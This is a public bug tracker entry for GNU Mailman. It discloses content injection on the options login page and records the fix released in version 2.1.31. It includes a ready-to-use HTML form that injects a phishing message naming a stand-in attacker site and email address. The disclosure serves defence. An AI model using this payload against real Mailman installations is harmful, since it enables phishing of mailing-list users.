Arbitrary Content Injection via the options login page.

Bug #1873722 reported by Mark Sapiro on 2020-04-20
6
This bug affects 1 person
Affects Status Importance Assigned to Milestone
GNU Mailman
Medium
Mark Sapiro

Bug Description

An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/ exists at different endpoint & param. It can lead to a phishing attack.

Steps To Reproduce:

1. Copy and save the following HTML code and open it in any browser.
Code:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/mailman/options/mailman" method="POST">
      <input type="hidden" name="email" value="Your&#32;account&#32;has&#32;been&#32;hacked&#46;&#32;Kindly&#32;go&#32;to&#32;https&#58;&#47;&#47;badsite&#46;com&#32;or&#32;share&#32;your&#32;credentials&#32;at&#32;attacker&#64;badsite&#46;com" />
      <input type="hidden" name="UserOptions" value="Unsubscribe&#32;or&#32;edit&#32;options" />
      <input type="hidden" name="language" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. Can be seen there- "Your account has been hacked. Kindly go to https://badsite.com or share your credentials at <email address hidden>" message will be displayed on the screen.

Related branches

CVE References

Mark Sapiro (msapiro) wrote :
Mark Sapiro (msapiro) on 2020-05-05
Changed in mailman:
milestone: none → 2.1.31
Mark Sapiro (msapiro) on 2020-05-05
Changed in mailman:
status: Confirmed → Fix Released
information type: Private Security → Public
To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Other bug subscribers